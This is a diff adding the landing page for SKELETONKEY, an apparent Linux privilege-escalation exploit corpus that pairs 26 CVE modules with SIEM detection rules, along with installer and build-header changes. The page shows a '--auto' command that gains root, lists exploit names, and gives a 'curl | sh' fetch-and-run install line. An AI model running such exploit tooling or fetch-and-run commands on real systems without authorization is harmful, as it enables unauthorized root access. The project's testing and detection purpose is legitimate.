+      <pre id="install-cmd"><span class="prompt">$</span> <span id="install-typed"></span><span class="cursor" id="install-cursor">▋</span></pre>
+    </div>
+
+    <div class="stats-row" id="stats-row">
+      <div class="stat-chip"><span class="num" data-target="31">0</span><span>modules</span></div>
+      <div class="stat-chip stat-vfy"><span class="num" data-target="22">0</span><span>✓ VM-verified</span></div>
+      <div class="stat-chip stat-kev"><span class="num" data-target="10">0</span><span>★ in CISA KEV</span></div>
+      <div class="stat-chip"><span class="num" data-target="119">0</span><span>detection rules</span></div>
+    </div>
+
+    <div class="cta-row">
+      <a class="btn btn-primary" href="https://github.com/KaraZajac/SKELETONKEY/releases/latest">
+        ↓ Latest release
+      </a>
+      <a class="btn" href="#explain">See <code>--explain</code> in action</a>
+      <a class="btn btn-ghost" href="https://github.com/KaraZajac/SKELETONKEY">
+        <svg height="16" viewBox="0 0 16 16" width="16" fill="currentColor"><path d="M8 0C3.58 0 0 3.58 0 8c0 3.54 2.29 6.53 5.47 7.59.4.07.55-.17.55-.38 0-.19-.01-.82-.01-1.49-2.01.37-2.53-.49-2.69-.94-.09-.23-.48-.94-.82-1.13-.28-.15-.68-.52-.01-.53.63-.01 1.08.58 1.23.82.72 1.21 1.87.87 2.33.66.07-.52.28-.87.51-1.07-1.78-.2-3.64-.89-3.64-3.95 0-.87.31-1.59.82-2.15-.08-.2-.36-1.02.08-2.12 0 0 .67-.21 2.2.82.64-.18 1.32-.27 2-.27.68 0 1.36.09 2 .27 1.53-1.04 2.2-.82 2.2-.82.44 1.1.16 1.92.08 2.12.51.56.82 1.27.82 2.15 0 3.07-1.87 3.75-3.65 3.95.29.25.54.73.54 1.48 0 1.07-.01 1.93-.01 2.2 0 .21.15.46.55.38A8.013 8.013 0 0 0 16 8c0-4.42-3.58-8-8-8z"/></svg>
+        Source on GitHub
+      </a>
+    </div>
+
+    <p class="hero-warn">Authorized testing only. See <a href="https://github.com/KaraZajac/SKELETONKEY/blob/main/docs/ETHICS.md">ETHICS.md</a>.</p>
+  </div>
+</header>
+
+<!-- ──────────────── TRUST STRIP ──────────────── -->
+<section class="trust-strip">
+  <div class="container">
+    <div class="trust-row">
+      <span class="trust-label">Grounded in authoritative sources</span>
+      <ul class="trust-items">
+        <li>CISA KEV catalog</li>
+        <li>NVD CVE API</li>
+        <li>MITRE ATT&amp;CK</li>
+        <li>kernel.org stable tree</li>
+        <li>Debian Security Tracker</li>
+        <li>NIST CWE</li>
+      </ul>
+    </div>
+  </div>
+</section>
+
+<!-- ──────────────── --EXPLAIN SHOWCASE ──────────────── -->
+<section id="explain" class="section section-feature reveal">
+  <div class="container">
+    <div class="section-head">
+      <span class="section-tag">flagship feature</span>
+      <h2>One command. Complete briefing.</h2>
+      <p class="lead">
+        <code>skeletonkey --explain &lt;module&gt;</code> renders the page every
+        team needs: CVE / CWE / MITRE ATT&amp;CK / CISA KEV status, host
+        fingerprint, live detect() trace with verdict, OPSEC footprint, and
+        the detection-rule coverage matrix. Triage tickets and SOC handoffs
+        in one paste.
+      </p>
+    </div>
+
+    <div class="terminal-shell">
+      <div class="terminal-bar">
+        <span class="install-dots" aria-hidden="true"><i></i><i></i><i></i></span>
+        <span class="install-title">skk-host ~ $</span>
+      </div>
+      <pre class="terminal-body" id="explain-output"></pre>
+    </div>
+
+    <div class="explain-annotations">
+      <div class="annotation">
+        <span class="anno-num">1</span>
+        <div>
+          <strong>Triage metadata in the header</strong>
+          <p>CWE class, MITRE ATT&amp;CK technique, CISA KEV status with
+          date_added. Fed from <code>tools/refresh-cve-metadata.py</code>
+          which pulls fresh from federal data sources.</p>
+        </div>
+      </div>
+      <div class="annotation">
+        <span class="anno-num">2</span>
+        <div>
+          <strong>Live host fingerprint</strong>
+          <p>Cached once at startup by <code>core/host.c</code>. Every
+          module sees the same kernel / arch / distro / userns / apparmor
+          / selinux / lockdown picture.</p>
+        </div>
+      </div>
+      <div class="annotation">
+        <span class="anno-num">3</span>
+        <div>
+          <strong>Real detect() trace</strong>
+          <p>The verbose stderr of the module's own probe — each gate
+          fires, each kernel_range entry checked, each verdict justified.
+          No more black-box "VULNERABLE" outputs.</p>
+        </div>
+      </div>
+      <div class="annotation">
+        <span class="anno-num">4</span>
+        <div>
+          <strong>OPSEC footprint</strong>
+          <p>Per-exploit description of what the SOC would see if this
+          fired: file artifacts, dmesg signatures, syscall observables,
+          network activity, cleanup behavior.</p>
+        </div>
+      </div>
+    </div>
+  </div>
+</section>
+
+<!-- ──────────────── BENTO FEATURES ──────────────── -->
+<section class="section section-bento reveal">
+  <div class="container">
+    <div class="section-head">
+      <span class="section-tag">capabilities</span>
+      <h2>Built for every side of the desk</h2>
+    </div>
+
+    <div class="bento">
+      <article class="bento-card bento-lg">
+        <div class="bento-icon">⚡</div>
+        <h3>Auto-pick the safest exploit</h3>
+        <p>
+          <code>--auto</code> ranks vulnerable modules by stability
+          (structural escapes &gt; page-cache writes &gt; userspace races
+          &gt; kernel races) and runs the safest one. Never crashes a
+          production box looking for root.
+        </p>
+        <pre class="bento-code">$ skeletonkey --auto --i-know
+[*] 3 vulnerable; safest is 'pwnkit' (rank 100)
+[*] launching --exploit pwnkit...
+# id
+uid=0(root) gid=0(root)</pre>
+      </article>
+
+      <article class="bento-card">
+        <div class="bento-icon">🛡</div>
+        <h3>119 detection rules</h3>
+        <p>
+          auditd · sigma · yara · falco. One command emits the corpus for
+          your SIEM. Each rule grounded in the module's own syscalls.
+        </p>
+        <div class="rule-cov">
+          <div class="rule-row"><span>auditd</span><span class="rule-bar"><i style="width:96.7%"></i></span><span>30/31</span></div>
+          <div class="rule-row"><span>sigma</span><span class="rule-bar"><i style="width:100%"></i></span><span>31/31</span></div>
+          <div class="rule-row"><span>yara</span><span class="rule-bar"><i style="width:90.3%"></i></span><span>28/31</span></div>
+          <div class="rule-row"><span>falco</span><span class="rule-bar"><i style="width:96.7%"></i></span><span>30/31</span></div>
+        </div>
+      </article>
+
+      <article class="bento-card bento-kev">
+        <div class="bento-icon">★</div>
+        <h3>CISA KEV prioritized</h3>
+        <p>
+          10 of 26 CVEs in the corpus are in CISA's Known Exploited
+          Vulnerabilities catalog — actively exploited in the wild.
+          Refreshed on demand via <code>tools/refresh-cve-metadata.py</code>.
+        </p>
+      </article>
+
+      <article class="bento-card">
+        <div class="bento-icon">🧬</div>
+        <h3>OPSEC notes per exploit</h3>
+        <p>
+          Each module ships a runtime-footprint paragraph: files, dmesg,
+          syscall observables, network, persistence. The inverse of the
+          detection rules — what an attacker would leave behind on
+          <em>your</em> host.
+        </p>
+      </article>
+
+      <article class="bento-card bento-lg">
+        <div class="bento-icon">🎯</div>
+        <h3>One host fingerprint, every module</h3>
+        <p>
+          <code>core/host.c</code> probes kernel / arch / distro / userns /
+          apparmor / selinux / lockdown / sudo version / polkit version
+          <em>once</em> at startup. Every <code>detect()</code> reads the
+          same cached snapshot, so verdicts stay coherent across the
+          corpus.
+        </p>
+        <pre class="bento-code">struct skeletonkey_host {
+    struct kernel_version kernel;
+    char arch[32], distro_id[64];
+    bool unprivileged_userns_allowed;
+    bool apparmor_restrict_userns;
+    bool kpti_enabled, selinux_enforcing;
+    char meltdown_mitigation[64];
+    char sudo_version[64], polkit_version[64];
+    ...
+};</pre>
+      </article>
+
+      <article class="bento-card">
+        <div class="bento-icon">📡</div>
+        <h3>JSON for pipelines</h3>
+        <p>
+          <code>--scan --json</code> emits a stable schema (see
+          <a href="https://github.com/KaraZajac/SKELETONKEY/blob/main/docs/JSON_SCHEMA.md">JSON_SCHEMA.md</a>)
+          with triage metadata, opsec notes, and rule coverage embedded.
+          Ready for Splunk / Elastic / Sentinel ingest.
+        </p>
+      </article>
+
+      <article class="bento-card">
+        <div class="bento-icon">🔒</div>
+        <h3>No SaaS. No telemetry.</h3>
+        <p>
+          One static binary. No phone-home, no analytics, no cloud
+          accounts. Reads <code>/proc</code> + <code>/sys</code>, runs the
+          probe, exits. JSON or plain text — your pipeline owns the data.
+        </p>
+      </article>
+
+      <article class="bento-card bento-vfy">
+        <div class="bento-icon">✓</div>
+        <h3>22 modules empirically verified</h3>
+        <p>
+          <code>tools/verify-vm/</code> spins up known-vulnerable
+          kernels (stock distro + mainline from kernel.ubuntu.com), runs
+          <code>--explain --active</code> per module, and records the
+          verdict. <strong>22 of 26 CVEs</strong> confirmed against
+          real Linux across Ubuntu 18.04 / 20.04 / 22.04 + Debian 11 / 12
+          + mainline 5.15.5 / 6.1.10. Records baked into the binary;
+          <code>--list</code> shows ✓ per module.
+        </p>
+      </article>
+    </div>
+  </div>
+</section>
+
+<!-- ──────────────── MODULE CORPUS ──────────────── -->
+<section id="corpus" class="section reveal">
+  <div class="container">
+    <div class="section-head">
+      <span class="section-tag">corpus</span>
+      <h2>26 CVEs across 10 years. ★ = actively exploited (CISA KEV).</h2>
+    </div>
+
+    <h3 class="corpus-h" data-color="green">
+      <span class="corpus-dot green"></span>
+      Lands root on a vulnerable host
+      <span class="corpus-h-sub">structural escapes + page-cache writes; no per-kernel offsets needed</span>
+    </h3>
+    <div class="pills">
+      <span class="pill green">copy_fail</span>
+      <span class="pill green">copy_fail_gcm</span>
+      <span class="pill green">dirty_frag_esp</span>
+      <span class="pill green">dirty_frag_esp6</span>
+      <span class="pill green">dirty_frag_rxrpc</span>
+      <span class="pill green kev">★ dirty_pipe</span>
+      <span class="pill green kev">★ dirty_cow</span>
+      <span class="pill green kev">★ pwnkit</span>
+      <span class="pill green kev">★ overlayfs</span>
+      <span class="pill green kev">★ overlayfs_setuid</span>
+      <span class="pill green">cgroup_release_agent</span>
+      <span class="pill green kev">★ ptrace_traceme</span>
+      <span class="pill green">sudoedit_editor</span>
+      <span class="pill green">entrybleed</span>
+    </div>
+
+    <h3 class="corpus-h" data-color="yellow">
+      <span class="corpus-dot yellow"></span>
+      Fires kernel primitive · opt-in <code>--full-chain</code>
+      <span class="corpus-h-sub">honest <code>EXPLOIT_FAIL</code> default; <code>--full-chain</code> runs the shared modprobe_path finisher</span>
+    </h3>
+    <div class="pills">
+      <span class="pill yellow kev">★ nf_tables</span>
+      <span class="pill yellow">nft_set_uaf</span>
+      <span class="pill yellow">nft_fwd_dup</span>
+      <span class="pill yellow">nft_payload</span>
+      <span class="pill yellow kev">★ netfilter_xtcompat</span>
+      <span class="pill yellow">af_packet</span>
+      <span class="pill yellow">af_packet2</span>
+      <span class="pill yellow">af_unix_gc</span>
+      <span class="pill yellow">cls_route4</span>
+      <span class="pill yellow kev">★ fuse_legacy</span>
+      <span class="pill yellow">stackrot</span>
+      <span class="pill yellow kev">★ sudo_samedit</span>
+      <span class="pill yellow">sequoia</span>
+      <span class="pill yellow">vmwgfx</span>
+    </div>
+
+    <p class="corpus-foot">
+      Full inventory with kernel ranges, mitigations, and detection
+      coverage:
+      <a href="https://github.com/KaraZajac/SKELETONKEY/blob/main/CVES.md">CVES.md</a>
+      ·
+      <a href="https://github.com/KaraZajac/SKELETONKEY/blob/main/docs/KEV_CROSSREF.md">KEV cross-reference</a>
+      ·
+      <a href="https://github.com/KaraZajac/SKELETONKEY/blob/main/docs/CVE_METADATA.json">CVE_METADATA.json</a>
+    </p>
+  </div>
+</section>
+
+<!-- ──────────────── AUDIENCE ──────────────── -->
+<section class="section section-audience reveal">
+  <div class="container">
+    <div class="section-head">
+      <span class="section-tag">who it's for</span>
+      <h2>Same project. Both sides of the engagement.</h2>
+    </div>
+
+    <div class="audience-grid">
+      <div class="audience-card audience-red">
+        <div class="audience-icon">🔴</div>
+        <h3>Red team / pentesters</h3>
+        <p>
+          <code>--auto</code> picks the safest exploit and runs it. Honest
+          scope reporting — never claims root it didn't actually get.
+          Per-exploit OPSEC notes tell you what telemetry you'll leave.
+          No more curating stale PoC repos.
+        </p>
+        <a href="https://github.com/KaraZajac/SKELETONKEY/blob/main/README.md" class="audience-link">Walkthrough →</a>
+      </div>
+      <div class="audience-card audience-blue">
+        <div class="audience-icon">🔵</div>
+        <h3>Blue team / SOC</h3>
+        <p>
+          One command ships SIEM coverage for the entire corpus.
+          <code>--explain</code> renders a triage briefing per CVE with
+          CWE / ATT&amp;CK / KEV / OPSEC — paste into the ticket.
+          KEV-prioritized so you fix what attackers are already using.
+        </p>
+        <a href="https://github.com/KaraZajac/SKELETONKEY/blob/main/docs/DETECTION_PLAYBOOK.md" class="audience-link">Playbook →</a>
+      </div>
+      <div class="audience-card audience-gray">
+        <div class="audience-icon">🛠</div>
+        <h3>Sysadmins / IT</h3>
+        <p>
+          <code>--scan</code> works without sudo. JSON output for CI
+          gates. Fleet-scan helper bundled. Compatible with everything
+          back to glibc 2.17 via the static-musl binary. No SaaS,
+          no analytics, no cloud accounts.
+        </p>
+        <a href="https://github.com/KaraZajac/SKELETONKEY/blob/main/docs/JSON_SCHEMA.md" class="audience-link">JSON schema →</a>
+      </div>
+      <div class="audience-card audience-purple">
+        <div class="audience-icon">🎓</div>
+        <h3>Researchers / CTF</h3>
+        <p>
+          26 CVEs, 10-year span, each with the original PoC author
+          credited and the kernel-range citation auditable.
+          <code>--explain</code> shows the reasoning chain; detection
+          rules let you practice both sides. Source is the documentation.
+        </p>
+        <a href="https://github.com/KaraZajac/SKELETONKEY/blob/main/docs/ARCHITECTURE.md" class="audience-link">Architecture →</a>
+      </div>
+    </div>
+  </div>
+</section>
+
+<!-- ──────────────── HONESTY CALLOUT ──────────────── -->
+<section class="section section-callout reveal">
+  <div class="container">
+    <div class="callout">
+      <div class="callout-mark">✓</div>
+      <div>
+        <h3>The verified-vs-claimed bar</h3>
+        <p>
+          Most public PoC repos hardcode offsets for one kernel build and
+          silently break elsewhere. <strong>SKELETONKEY refuses to ship
+          fabricated offsets.</strong> The shared <code>--full-chain</code>
+          finisher returns <code>EXPLOIT_OK</code> only when a setuid
+          bash sentinel file <em>actually appears</em>. Modules with a
+          primitive but no portable cred-overwrite chain default to
+          firing the primitive + grooming the slab + recording a witness,
+          then return <code>EXPLOIT_FAIL</code> with diagnostic.
+          Operators populate the offset table once per kernel via
+          <code>--dump-offsets</code> and upstream the entry via PR.
+        </p>
+      </div>
+    </div>
+  </div>
+</section>
+
+<!-- ──────────────── QUICKSTART ──────────────── -->
+<section id="quickstart" class="section reveal">
+  <div class="container">
+    <div class="section-head">
+      <span class="section-tag">quickstart</span>
+      <h2>Five commands.</h2>
+    </div>
+
+    <div class="tabs" role="tablist">
+      <button class="tab active" data-tab="install" role="tab">install</button>
+      <button class="tab" data-tab="scan" role="tab">scan</button>
+      <button class="tab" data-tab="explain" role="tab">explain</button>
+      <button class="tab" data-tab="auto" role="tab">auto</button>
+      <button class="tab" data-tab="detect" role="tab">detect-rules</button>
+    </div>
+
+    <div class="tab-panel active" data-tab="install">
+<pre class="code"><span class="cmt"># install (x86_64 / arm64; checksum-verified)</span>
+<span class="prompt">$</span> curl -sSL https://github.com/KaraZajac/SKELETONKEY/releases/latest/download/install.sh | sh
+<span class="cmt"># default is the musl-static x86_64 binary — works back to glibc 2.17</span></pre>
+    </div>
+    <div class="tab-panel" data-tab="scan">
+<pre class="code"><span class="cmt"># inventory — no sudo needed</span>
+<span class="prompt">$</span> skeletonkey --scan
+<span class="cmt"># or machine-readable for a SIEM</span>
+<span class="prompt">$</span> skeletonkey --scan --json | jq '.findings[] | select(.verdict == "VULNERABLE")'</pre>
+    </div>
+    <div class="tab-panel" data-tab="explain">
+<pre class="code"><span class="cmt"># one-page operator briefing for a single CVE</span>
+<span class="prompt">$</span> skeletonkey --explain nf_tables
+<span class="cmt"># shows CVE/CWE/ATT&amp;CK/KEV header, host fingerprint, live trace,</span>
+<span class="cmt"># verdict, OPSEC footprint, detection coverage. Paste into your ticket.</span></pre>
+    </div>
+    <div class="tab-panel" data-tab="auto">
+<pre class="code"><span class="cmt"># pick the safest exploit and run it</span>
+<span class="prompt">$</span> skeletonkey --auto --i-know
+<span class="cmt"># --dry-run for "what would it do?" without launching</span>
+<span class="prompt">$</span> skeletonkey --auto --dry-run</pre>
+    </div>
+    <div class="tab-panel" data-tab="detect">
+<pre class="code"><span class="cmt"># deploy SIEM coverage (needs sudo to write to /etc/audit/rules.d/)</span>
+<span class="prompt">$</span> skeletonkey --detect-rules --format=auditd | sudo tee /etc/audit/rules.d/99-skeletonkey.rules
+<span class="prompt">$</span> sudo augenrules --load
+
+<span class="cmt"># or in YAML for falco / sigma / yara</span>
+<span class="prompt">$</span> skeletonkey --detect-rules --format=falco &gt; /etc/falco/skeletonkey_rules.yaml</pre>
+    </div>
+  </div>
+</section>
+
+<!-- ──────────────── ROADMAP / TIMELINE ──────────────── -->
+<section class="section section-timeline reveal">
+  <div class="container">
+    <div class="section-head">
+      <span class="section-tag">where we are</span>
+      <h2>Recently shipped · in flight · next.</h2>
+    </div>
+
+    <div class="timeline">
+      <div class="tl-col tl-shipped">
+        <div class="tl-tag">shipped</div>
+        <ul>
+          <li><strong>22 of 26 CVEs empirically verified</strong> in real Linux VMs</li>
+          <li><strong>kernel.ubuntu.com/mainline/</strong> kernel fetch path — unblocks pin-not-in-apt targets</li>
+          <li>Per-module <code>verified_on[]</code> table baked into the binary</li>
+          <li><strong>--explain mode</strong> — one-page operator briefing per CVE</li>
+          <li><strong>OPSEC notes</strong> — per-module runtime footprint</li>
+          <li><strong>CISA KEV + NVD CWE + MITRE ATT&amp;CK</strong> metadata pipeline</li>
+          <li>119 detection rules across all four SIEM formats</li>
+          <li><code>core/host.c</code> shared host-fingerprint refactor</li>
+          <li>88-test harness (kernel_range + detect integration)</li>
+        </ul>
+      </div>
+      <div class="tl-col tl-active">
+        <div class="tl-tag">in flight</div>
+        <ul>
+          <li>9 deferred TOO_TIGHT kernel-range drift findings</li>
+          <li>PackageKit provisioner so pack2theroot can hit the VULNERABLE path</li>
+          <li>Custom Vagrant box for kernels ≤ 4.4 (unblock dirty_cow verification)</li>
+        </ul>
+      </div>
+      <div class="tl-col tl-next">
+        <div class="tl-tag">next</div>
+        <ul>
+          <li>arm64 musl-static binary (Raspberry-Pi-class deployments)</li>
+          <li>Mass-fleet scan aggregator → heat-map dashboard</li>
+          <li>SIEM query templates (Splunk SPL, Elastic KQL, Sentinel KQL)</li>
+          <li>CWE / ATT&amp;CK filter for <code>--scan --json</code></li>
+          <li>CI hardening: clang-tidy, scan-build, drift-check job</li>
+        </ul>
+      </div>
+    </div>
+
+    <p class="tl-foot">
+      Full roadmap and contribution guide:
+      <a href="https://github.com/KaraZajac/SKELETONKEY/blob/main/ROADMAP.md">ROADMAP.md</a>
+      ·
+      <a href="https://github.com/KaraZajac/SKELETONKEY/blob/main/CONTRIBUTING.md">CONTRIBUTING.md</a>
+    </p>
+  </div>
+</section>
+
+<!-- ──────────────── FOOTER ──────────────── -->
+<footer class="footer">
+  <div class="container footer-inner">
+    <div class="footer-col">
+      <div class="footer-brand">
+        <span class="nav-mark" aria-hidden="true">◆</span>
+        SKELETONKEY
+      </div>
+      <p class="footer-tag">
+        Curated Linux LPE corpus with SOC-ready detection rules. One
+        binary, no SaaS, no telemetry. MIT licensed.
+      </p>
+    </div>
+    <div class="footer-col">
+      <h4>Project</h4>
+      <ul>
+        <li><a href="https://github.com/KaraZajac/SKELETONKEY">Source</a></li>
+        <li><a href="https://github.com/KaraZajac/SKELETONKEY/releases">Releases</a></li>
+        <li><a href="https://github.com/KaraZajac/SKELETONKEY/blob/main/CVES.md">CVE inventory</a></li>
+        <li><a href="https://github.com/KaraZajac/SKELETONKEY/blob/main/ROADMAP.md">Roadmap</a></li>
+      </ul>
+    </div>
+    <div class="footer-col">
+      <h4>Docs</h4>
+      <ul>
+        <li><a href="https://github.com/KaraZajac/SKELETONKEY/blob/main/docs/ARCHITECTURE.md">Architecture</a></li>
+        <li><a href="https://github.com/KaraZajac/SKELETONKEY/blob/main/docs/DETECTION_PLAYBOOK.md">Detection playbook</a></li>
+        <li><a href="https://github.com/KaraZajac/SKELETONKEY/blob/main/docs/JSON_SCHEMA.md">JSON schema</a></li>
+        <li><a href="https://github.com/KaraZajac/SKELETONKEY/blob/main/docs/OFFSETS.md">Offsets</a></li>
+      </ul>
+    </div>
+    <div class="footer-col">
+      <h4>Ethics</h4>
+      <ul>
+        <li><a href="https://github.com/KaraZajac/SKELETONKEY/blob/main/docs/ETHICS.md">ETHICS.md</a></li>
+        <li><a href="https://github.com/KaraZajac/SKELETONKEY/blob/main/docs/DEFENDERS.md">For defenders</a></li>
+        <li><a href="https://github.com/KaraZajac/SKELETONKEY/blob/main/CONTRIBUTING.md">Contribute</a></li>
+      </ul>
+    </div>
+  </div>
+  <div class="container footer-bottom">
+    <p>
+      Each module credits the original CVE reporter and PoC author in its
+      <code>NOTICE.md</code>. The research credit belongs to the people
+      who found the bugs.
+    </p>
+    <p class="footer-meta">
+      v0.6.0 · MIT · <a href="https://github.com/KaraZajac/SKELETONKEY">github.com/KaraZajac/SKELETONKEY</a>
+    </p>
+  </div>
+</footer>
+
+<script src="app.js" defer></script>
+
+</body>
+</html>
@@ -0,0 +1,85 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<svg xmlns="http://www.w3.org/2000/svg" width="1200" height="630" viewBox="0 0 1200 630">
+  <defs>
+    <linearGradient id="bg" x1="0" y1="0" x2="1" y2="1">
+      <stop offset="0" stop-color="#07070d"/>
+      <stop offset="1" stop-color="#0c0c16"/>
+    </linearGradient>
+    <linearGradient id="brand" x1="0" y1="0" x2="1" y2="0">
+      <stop offset="0" stop-color="#10b981"/>
+      <stop offset="1" stop-color="#06b6d4"/>
+    </linearGradient>
+    <radialGradient id="glow1" cx="0.2" cy="0.3" r="0.6">
+      <stop offset="0" stop-color="#10b981" stop-opacity="0.18"/>
+      <stop offset="1" stop-color="#10b981" stop-opacity="0"/>
+    </radialGradient>
+    <radialGradient id="glow2" cx="0.85" cy="0.8" r="0.5">
+      <stop offset="0" stop-color="#a855f7" stop-opacity="0.16"/>
+      <stop offset="1" stop-color="#a855f7" stop-opacity="0"/>
+    </radialGradient>
+  </defs>
+
+  <!-- backgrounds -->
+  <rect width="1200" height="630" fill="url(#bg)"/>
+  <rect width="1200" height="630" fill="url(#glow1)"/>
+  <rect width="1200" height="630" fill="url(#glow2)"/>
+
+  <!-- diamond mark -->
+  <g transform="translate(80,140)">
+    <rect x="0" y="0" width="36" height="36" transform="rotate(45 18 18)" fill="url(#brand)"/>
+  </g>
+
+  <!-- wordmark -->
+  <text x="142" y="170" font-family="'Space Grotesk','Inter',sans-serif" font-weight="700" font-size="68" fill="#ecedf7" letter-spacing="-2">
+    SKELETONKEY
+  </text>
+
+  <!-- tagline -->
+  <text x="80" y="240" font-family="'Inter',sans-serif" font-size="32" fill="#c5c5d3" font-weight="500">
+    Curated Linux LPE corpus.
+  </text>
+  <text x="80" y="282" font-family="'Inter',sans-serif" font-size="32" fill="#c5c5d3" font-weight="500">
+    22 of 26 CVEs verified in real Linux VMs.
+  </text>
+
+  <!-- stat chips -->
+  <g transform="translate(80,360)">
+    <!-- 31 modules -->
+    <rect x="0" y="0" width="190" height="58" rx="29" fill="#161628" stroke="#25253c"/>
+    <text x="28" y="38" font-family="'JetBrains Mono',monospace" font-weight="700" font-size="22" fill="#ecedf7">31</text>
+    <text x="64" y="37" font-family="'Inter',sans-serif" font-size="16" fill="#8a8a9d">modules</text>
+
+    <!-- 22 VM-verified -->
+    <rect x="206" y="0" width="240" height="58" rx="29" fill="#161628" stroke="#10b981" stroke-opacity="0.5"/>
+    <text x="234" y="38" font-family="'JetBrains Mono',monospace" font-weight="700" font-size="22" fill="#34d399">22</text>
+    <text x="270" y="37" font-family="'Inter',sans-serif" font-size="16" fill="#8a8a9d">✓ VM-verified</text>
+
+    <!-- 10 KEV -->
+    <rect x="482" y="0" width="218" height="58" rx="29" fill="#161628" stroke="#ef4444" stroke-opacity="0.4"/>
+    <text x="510" y="38" font-family="'JetBrains Mono',monospace" font-weight="700" font-size="22" fill="#ef4444">10</text>
+    <text x="546" y="37" font-family="'Inter',sans-serif" font-size="16" fill="#8a8a9d">★ in CISA KEV</text>
+
+    <!-- 119 rules -->
+    <rect x="736" y="0" width="232" height="58" rx="29" fill="#161628" stroke="#25253c"/>
+    <text x="764" y="38" font-family="'JetBrains Mono',monospace" font-weight="700" font-size="22" fill="#ecedf7">119</text>
+    <text x="810" y="37" font-family="'Inter',sans-serif" font-size="16" fill="#8a8a9d">detection rules</text>
+  </g>
+
+  <!-- terminal mockup -->
+  <g transform="translate(80,478)">
+    <rect x="0" y="0" width="1040" height="92" rx="12" fill="#0a0a14" stroke="#25253c"/>
+    <!-- bar -->
+    <circle cx="22" cy="22" r="6" fill="#ff5f57"/>
+    <circle cx="42" cy="22" r="6" fill="#febc2e"/>
+    <circle cx="62" cy="22" r="6" fill="#28c840"/>
+    <line x1="0" y1="44" x2="1040" y2="44" stroke="#1c1c2d"/>
+    <text x="24" y="78" font-family="'JetBrains Mono',monospace" font-size="20" fill="#ecedf7">
+      <tspan fill="#10b981">$</tspan> skeletonkey --explain nf_tables    <tspan fill="#5b5b75"># operator briefing in one command</tspan>
+    </text>
+  </g>
+
+  <!-- subtle url at very bottom -->
+  <text x="1120" y="610" font-family="'JetBrains Mono',monospace" font-size="14" fill="#5b5b75" text-anchor="end">
+    karazajac.github.io/SKELETONKEY
+  </text>
+</svg>
@@ -19,7 +19,12 @@
 #   0 — installed successfully
 #   1 — error (unsupported arch, download failure, permission denied)

-set -euo pipefail
+# POSIX-friendly: -eu is universal, pipefail only on shells that
+# support it (bash, ksh, dash >= 0.5.12). Without pipefail the
+# installer still exits on the first hard error since every curl/
+# tar/install step is checked explicitly.
+set -eu
+(set -o pipefail) 2>/dev/null && set -o pipefail || true

 REPO="${SKELETONKEY_REPO:-KaraZajac/SKELETONKEY}"
 VERSION="${SKELETONKEY_VERSION:-latest}"
@@ -32,7 +37,19 @@ fail()  { printf '[\033[1;31m-\033[0m] %s\n' "$*" >&2; exit 1; }
 # Detect architecture
 arch=$(uname -m)
 case "$arch" in
-    x86_64|amd64)        target=x86_64 ;;
+    # x86_64 default: the musl-static binary works on every libc
+    # (glibc 2.x of any version, musl, uclibc) — costs ~800 KB extra
+    # vs the dynamic build but eliminates the GLIBC_2.NN portability
+    # ceiling that bit users on Debian-stable / older RHEL hosts.
+    # Set SKELETONKEY_DYNAMIC=1 to fetch the smaller dynamic build
+    # (needs glibc >= 2.38, i.e. Ubuntu 24.04 / Debian 13 / RHEL 10).
+    x86_64|amd64)
+        if [ "${SKELETONKEY_DYNAMIC:-0}" = "1" ]; then
+            target=x86_64
+        else
+            target=x86_64-static
+        fi
+        ;;
    aarch64|arm64)       target=arm64  ;;
    *) fail "Unsupported architecture: $arch (only x86_64 and arm64 currently)" ;;
 esac
@@ -1,27 +0,0 @@
-# Fragnesia — CVE pending
-
-> ⚪ **PLANNED** stub. See [`../../ROADMAP.md`](../../ROADMAP.md)
-> Phase 7+.
-
-## Summary
-
-ESP shared-frag in-place encrypt path can be coerced into writing
-into the page cache of an unrelated file. Same primitive shape as
-Dirty Frag, different reach.
-
-## Status
-
-Audit-stage. See
-`security-research/findings/audit_leak_write_modprobe_backups_2026-05-16.md`
-section on backup primitives. Notably: trigger appears to require
-CAP_NET_ADMIN inside a userns netns. On kCTF (shared net_ns) that's
-cap-dead, but on host systems where user_ns clone is enabled it's
-reachable.
-
-## Decision needed before implementing
-
-Is the unprivileged-userns-netns scenario in scope for SKELETONKEY? If
-yes, this module ships. If we restrict to "default Linux user
-account, no namespace tricks," this module is out of scope.
-
-## Not started.
@@ -45,9 +45,6 @@

 #include "skeletonkey_modules.h"
 #include "../../core/registry.h"
-#include "../../core/kernel_range.h"
-#include "../../core/offsets.h"
-#include "../../core/finisher.h"

 #include <stdio.h>
 #include <stdlib.h>
@@ -55,13 +52,19 @@
 #include <stdint.h>
 #include <stdbool.h>
 #include <unistd.h>
+
+#ifdef __linux__
+
+#include "../../core/kernel_range.h"
+#include "../../core/host.h"
+#include "../../core/offsets.h"
+#include "../../core/finisher.h"
+
 #include <errno.h>
 #include <fcntl.h>
 #include <sched.h>
 #include <sys/wait.h>
 #include <sys/socket.h>
-
-#ifdef __linux__
 #include <sys/mman.h>
 #include <sys/ioctl.h>
 #include <sys/syscall.h>
@@ -72,52 +75,6 @@
 #include <linux/if_ether.h>
 #include <linux/if_arp.h>
 #include <poll.h>
-#endif
-
-/* ---------- macOS / non-linux build stubs ---------------------------
- * Modules in SKELETONKEY are dev-built on macOS and run-built on Linux.
- * Provide empty stubs so syntax checks pass without Linux headers.
- * The exploit path is gated at runtime on the kernel version anyway,
- * so the stubs are never reached on macOS targets. */
-#ifndef __linux__
-#define CLONE_NEWUSER       0x10000000
-#define CLONE_NEWNET        0x40000000
-#define ETH_P_ALL           0x0003
-#define ETH_P_8021Q         0x8100
-#define ETH_P_8021AD        0x88A8
-#define ETH_P_IP            0x0800
-#define ETH_ALEN            6
-#define ETH_HLEN            14
-#define VLAN_HLEN           4
-#define IFF_UP              0x01
-#define IFF_RUNNING         0x40
-#define SIOCSIFFLAGS        0x8914
-#define SIOCGIFINDEX        0x8933
-#define SIOCGIFFLAGS        0x8913
-#define SOL_PACKET          263
-#define PACKET_RX_RING      5
-#define PACKET_VERSION      10
-#define PACKET_QDISC_BYPASS 20
-#define TPACKET_V2          1
-#define PACKET_HOST         0
-struct sockaddr_ll { unsigned short sll_family; unsigned short sll_protocol; int sll_ifindex; int dummy; };
-struct ifreq { char name[16]; union { int ifr_ifindex; short ifr_flags; } u; };
-struct tpacket_req { unsigned int tp_block_size, tp_block_nr, tp_frame_size, tp_frame_nr; };
-struct tpacket2_hdr { unsigned int tp_status, tp_len, tp_snaplen; unsigned short tp_mac, tp_net; };
-struct pollfd { int fd; short events, revents; };
-#define POLLIN 0x001
